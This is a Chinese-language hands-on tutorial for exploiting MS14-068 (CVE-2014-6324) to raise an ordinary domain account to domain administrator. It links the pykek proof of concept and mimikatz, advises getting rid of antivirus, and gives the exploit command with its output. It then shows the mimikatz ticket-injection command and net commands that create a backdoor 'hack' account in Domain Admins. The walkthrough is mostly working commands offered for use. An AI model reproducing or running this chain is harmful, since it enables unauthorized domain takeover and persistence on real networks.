MS14-068漏洞是微软2014年11月19日发布的补丁,修复了CVE-2014-6324高危漏洞,这是一个域内特权提升漏洞,号称内网杀手,允许攻击者提升普通域账号为域管理员账号。漏洞原理不多说,看实战步骤:

一.准备工作

1.一个域内普通账号及密码
2.客户机要装python,域服务器和客户机没打MS14-068补丁,有杀软的自己想办法干掉
3.POC : ms14-068.py 下载地址: https://github.com/bidord/pykek
4.mimikatz 2.0 :下载地址: https://github.com/gentilkiwi/mimikatz/releases

二.开始

先看一下poc的用法:

USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
OPTIONS:
-p <clearPassword>
--rc4 <ntlmHash>

userName@domainName :普通域账号
usersid :该普通账号的sid 可以用 whoami /all 来查看
domainControlerAddr:域控服务器地址

我的信息是:
账户:test@52os.net 密码:123456 sid:S-1-5-21-1156765339-1089940178-2237897153-1198 域控:192.168.1.254

python ms14-068.py -u test@52os.net -s S-1-5-21-1156765339-1089940178-2237897153-1198 -d 192.168.1.254
Password:
[+] Building AS-REQ for 192.168.1.254... Done!
[+] Sending AS-REQ to 192.168.1.254... Done!
[+] Receiving AS-REP from 192.168.1.254... Done!
[+] Parsing AS-REP from 192.168.1.254... Done!
[+] Building TGS-REQ for 192.168.1.254... Done!
[+] Sending TGS-REQ to 192.168.1.254... Done!
[+] Receiving TGS-REP from 192.168.1.254... Done!
[+] Parsing TGS-REP from 192.168.1.254... Done!
[+] Creating ccache file 'TGT_test@52os.net.ccache'... Done!

执行完会在当前目录生成TGT_test@52os.net.ccache文件,然后用mimikatz注入。
mimikatz2.0版本才有kerberos::ptc这个模块,同时要注意对应系统版本,注入命令:

mimikatz.exe "kerberos::ptc TGT_test@52os.net.ccache"

如果执行成功会提示:
*Injecting ticket :OK

然后输入 exit,会得到一个和默认的cmd显示字体等不一样的命令行,这个就是注入session后的命令行。在这个命令行里,当前普通用户权限是在域管理员组里的,会用这个注入的session去连接域控执行命令。而且在域控的Domain Admins组和其他管理员组里是没有test@52os.net这个用户。

然后就可以为所欲为了,例如加域用户提权 :

net user hack 111111 /add /domain
net group "Domain admins" hack /add /domain

参考文章:
http://www.secpulse.com/archives/2277.html
http://zone.wooyun.org/content/17102